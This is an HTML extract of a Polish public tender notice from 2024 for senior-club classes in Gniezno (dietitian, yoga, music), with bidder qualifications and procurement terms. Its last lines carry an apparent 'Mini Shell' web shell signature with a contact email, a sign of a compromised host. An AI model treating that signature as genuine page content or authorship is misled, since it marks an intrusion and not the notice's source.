class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera w zakresie pracy z seniorami</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie: usługi prowadzenia zajęć z dietetykiem dla uczestników Gnieźnieńskiego Klubu Seniora w Gnieźnie na potrzeby ośrodka wsparcia pn. „Gnieźnieński Klub Seniora”, współfinansowanego w ramach Programu Regionalnego Fundusze Europejskie dla Wielkopolski 2021-2027, pn.: „Gniezno stawia na rozwój usług społecznych”.<br/>Zamawiający wymaga by w czasie trwania umowy usługę przeprowadzono w następujący sposób:<br/>- w roku 2024 dla jednej grupy,<br/>- w roku 2025 dla czterech grup,<br/>- w roku 2026 dla czterech grup.<br/>1.	Liczba godzin usługi oraz szacowana liczba osób objętych usługami:<br/>1)	w roku 2024 – 30 godzin zegarowych,<br/>2)	w roku 2025 – 154 godziny zegarowe dla 122 osób łącznie, w tym:<br/>I grupa: 30 godzin dla max 41 osób,<br/>II grupa: 30 godzin dla max 41 osób,<br/>III grupa: 47 godzin dla max 20 osób,<br/>IV grupa: 47 godzin dla max 20 osób.<br/>3)	w roku 2026 – 152 godziny zegarowe dla 122 osób łącznie, w tym:<br/>I grupa: 30 godzin dla max 41 osób,<br/>II grupa: 30 godzin dla max 41 osób,<br/>III grupa: 46 godzin dla max 20 osób,<br/>IV grupa: 46 godzin dla max 20 osób.<br/>2.	Uczestnicy zajęć: osoby w wieku powyżej 60 roku życia.<br/>3.	Termin zajęć: Zajęcia przeprowadzane będą od dnia podpisania umowy do dnia 11 grudnia 2026 r.<br/>4.	Przedmiot zajęć: W ramach zajęć uczestnicy zwiększą swoją wiedzę w zakresie żywienia poprzez zajęcia teoretyczne. Będą mieli możliwość skorzystania z zajęć praktycznych, dzięki czemu rozwiną swoje umiejętności manualne i kreatywne. Nauczą się kreowania dobrych nawyków żywieniowych oraz propagowania zdrowego stylu życia. Zajęcia będą również dobrą okazją do integracji oraz wzmocnienia jakości życia seniorów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera w zakresie pracy z seniorami</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie: usługi prowadzenia zajęć z jogi dla uczestników Gnieźnieńskiego Klubu Seniora w Gnieźnie na potrzeby ośrodka wsparcia pn. „Gnieźnieński Klub Seniora”, współfinansowanego w ramach Programu Regionalnego Fundusze Europejskie dla Wielkopolski 2021-2027, pn.: „Gniezno stawia na rozwój usług społecznych”.<br/>Zamawiający wymaga by w czasie trwania umowy usługę przeprowadzono w następujący sposób:<br/>- w roku 2024 dla jednej grupy,<br/>- w roku 2025 dla czterech grup,<br/>- w roku 2026 dla czterech grup.<br/>1.	Liczba godzin usługi oraz szacowana liczba osób objętych usługami :<br/>1)	w roku 2024 – 30 godzin zegarowych, <br/>2)	w roku 2025 – 156 godzin zegarowych dla 122 osób łącznie, w tym:<br/>I grupa: 30 godzin dla max 41 osób,<br/>II grupa: 30 godzin dla max 41 osób,<br/>III grupa: 48 godzin dla max 20 osób,<br/>IV grupa: 48 godzin dla max 20 osób.<br/>3)	w roku 2026 – 150 godzin zegarowych dla 122 osób łącznie, w tym:<br/>I grupa: 30 godzin dla max 41 osób,<br/>II grupa: 30 godzin dla max 41 osób,<br/>III grupa: 45 godzin dla max 20 osób,<br/>IV grupa: 45 godzin dla max 20 osób.<br/>2.	Uczestnicy zajęć: osoby w wieku powyżej 60 roku życia.<br/>3.	Termin zajęć: Zajęcia przeprowadzane będą od dnia podpisania umowy do 11 grudnia 2026 r. <br/>4.	Przedmiot zajęć: Zajęcia będą dostosowane specjalnie do potrzeb i możliwości seniorów. Zajęcia będą przebiegać w spokojnej atmosferze a ich wykonanie nie będzie trudne. Celem ćwiczeń jest osiągnięcie możliwie jak największej elastyczności ciała oraz usunięcie napięć i sztywności powstałych na skutek braku aktywności fizycznej. Ważnym elementem ćwiczeń jest profilaktyka lub spowolnienie postępowania zwyrodnień w obrębie układu kostnego. Wykonawca ma obowiązek czuwać nad prawidłowym wykonywaniem ćwiczeń odpowiednie dopasowanych do możliwości uczestników. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-11</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera w zakresie pracy z seniorami</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie: usługi prowadzenia zajęć muzycznych dla uczestników Gnieźnieńskiego Klubu Seniora w Gnieźnie na potrzeby ośrodka wsparcia pn. „Gnieźnieński Klub Seniora”.<br/>Zamawiający wymaga by w czasie trwania umowy usługę przeprowadzono w następujący sposób:<br/>- w roku 2025 dla dwóch grup,<br/>- w roku 2026 dla dwóch grup.<br/>1.	Liczba godzin usługi oraz szacowana liczba osób objętych usługami:<br/>1)	w roku 2025 – 60 godzin zegarowych dla 122 osób łącznie, w tym:<br/>I grupa: 30 godzin dla max 61 osób,<br/>II grupa: 30 godzin dla max 61 osób.<br/>2)	w roku 2026 – 60 godzin zegarowych dla 122 osób łącznie, w tym:<br/>I grupa: 30 godzin dla max 61 osób<br/>II grupa: 30 godzin dla max 61 osób.<br/>2.	Uczestnicy zajęć: osoby w wieku powyżej 60 roku życia.<br/>3.	Termin zajęć: Zajęcia przeprowadzane będą od miesiąca lutego 2025 r. do dnia 17 grudnia 2026 r.<br/>4.	Przedmiot zajęć: W ramach zajęć uczestnicy poznają na nowo utwory muzyki klasycznej (i nie tylko), będą wspólnie śpiewać i muzykować na różnych instrumentach. Nauczą się też podstaw rytmiki, czyli ruchu do muzyki, który świetnie wpływa na koordynację ruchową oraz pozwala na utrzymanie pamięci w doskonałej kondycji. Znajdzie się też czas na wspólny taniec, integrację i dobrą zabawę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">80400000-8 - Usługi edukacji osób dorosłych oraz inne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-17</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe trenera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie trenera w zakresie pracy z seniorami</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>a) zdolności do występowania w obrocie gospodarczym;<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów; <br/>c) sytuacji ekonomicznej lub finansowej; <br/>d) zdolności technicznej lub zawodowej.<br/><br/>2. Opis sposobu spełnienia warunków udziału w postępowaniu:<br/>A.	Zamawiający nie określa warunku udziału w postępowaniu dotyczącego zdolności do występowania w obrocie gospodarczym.<br/>B.	Zamawiający nie określa warunku udziału w postępowaniu dotyczącego posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. <br/>C.	W odniesieniu do warunków udziału w postępowaniu dotyczących sytuacji finansowej lub ekonomicznej, zamawiający nie określa warunku udziału w postępowaniu <br/>D.	Zamawiający stawia następujące warunki w zakresie zdolności technicznej i zawodowej: <br/><br/>D.1. Część I – zajęcia plastyczne:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że: <br/>1)	wykonał w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 usługę w zakresie prowadzenia zajęć plastycznych<br/>oraz<br/>2)	osoby skierowane przez Wykonawcę do realizacji zamówienia posiadają łącznie:<br/>a) wykształcenie:<br/>- w zawodzie terapeuty zajęciowego<br/>lub <br/>- co najmniej średnie plastyczne<br/>- co najmniej średnie i ukończony kurs/szkolenie z zakresu zajęć plastycznych;<br/>b) co najmniej 20 godzin doświadczenia w zakresie prowadzenia zajęć plastycznych. <br/><br/>D.2. Część II – zajęcia ruchowe nordic walking:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że: <br/>1)	wykonał w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 usługę w zakresie prowadzenia zajęć z nordic walking;<br/>oraz<br/>2)	osoby skierowane przez Wykonawcę do realizacji zamówienia posiadają łącznie:<br/>a) wykształcenie co najmniej średnie oraz kurs/szkolenie instruktora nordic walking;<br/>b) co najmniej 20 godzin doświadczenia w zakresie prowadzenia zajęć z nordic walking<br/><br/>D.3. Część III – zajęcia z dietetykiem:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że: <br/>1)	wykonał w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 usługę w zakresie prowadzenia zajęć z dietetyki<br/>oraz<br/>2)	osoby skierowane przez Wykonawcę do realizacji zamówienia posiadają łącznie:<br/>a)	wykształcenie co najmniej średnie-kierunek dietetyka<br/>lub<br/>	-co najmniej średnie oraz kurs/szkolenie z zakresu dietetyki;<br/>b) co najmniej 20 godzin doświadczenia w zakresie prowadzenia zajęć z dietetyki. <br/><br/>D.4. Część IV – zajęcia z jogi:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że: <br/>1)	wykonał w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 usługę w zakresie prowadzenia zajęć z jogi<br/>oraz<br/>2)	osoby skierowane przez Wykonawcę do realizacji zamówienia posiadają łącznie:<br/>a) wykształcenie:<br/>- co najmniej średnie i kurs/szkolenie z zakresu jogi;<br/>b) co najmniej 20 godzin doświadczenia w zakresie prowadzenia zajęć jogi. <br/><br/>D.5. Część V – zajęcia muzyczne:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że: <br/>1)	wykonał w okresie 3 ostatnich lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 usługę w zakresie prowadzenia zajęć muzycznych<br/>oraz<br/>2)	osoby skierowane przez Wykonawcę do realizacji zamówienia posiadają co najmniej 60 godzin doświadczenia w zakresie prowadzenia zajęć muzycznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o braku podstaw do wykluczenia - na podstawie art. 125 ust. 1 ustawy Pzp - zał. nr 2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz wykonanych usług, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane – Załącznik nr 8 do SWZ; <br/>2)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – Załącznik nr 9 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana,<br/>zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę<br/>tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień niniejszej umowy może nastąpić w formie pisemnej w dopuszczalnych granicach wynikających z art. 455 ustawy Pzp.<br/><br/>2. Zamawiający przewiduje zmiany postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru oferty, z zastrzeżeniem, że zmiana umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.<br/><br/>3. Dopuszczalne są również zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości pierwotnej umowy, a zmiany te nie powodują zmiany ogólnego charakteru umowy.<br/><br/>4. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu w następujących przypadkach:<br/>1) zmiany urzędowej stawki podatku VAT,<br/>2) konieczności zmiany terminu realizacji umowy określonego w § 2;<br/>3) zwiększenia liczby godzin usług stanowiących przedmiot umowy ogółem, co zwiększy wartość przedmiotu umowy, o której mowa w § 3 ust. 2 w przypadku zwiększenia zapotrzebowania ze strony Zamawiającego na świadczenie usług stanowiących przedmiot niniejszej umowy.<br/>4) zmniejszenia wartości zamówienia ogółem - bez możliwości dochodzenia roszczeń z tego tytułu ze strony Wykonawcy w przypadku:<br/>a) czasowego zawieszenia wykonania umowy,<br/>b) zmniejszenia liczby godzin.<br/>5. Minimalna wartość zamówienia w związku z zastosowaniem przepisu ust. 4 pkt 4 powyżej, nie może być niższa niż 50% wynagrodzenia brutto określonego w § 4 ust. 2 umowy.<br/>Na podstawie przepisu art. 439 Pzp, w przypadku, gdy umowa zawarta jest na okres dłuższy niż 6 miesięcy, Zamawiający dopuszcza możliwość zmiany wynagrodzenia (waloryzacja), zgodnie z paragrafem 7 ust.6 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć za pośrednictwem Platformy e-Zamówienia pod adresem: https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-03 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com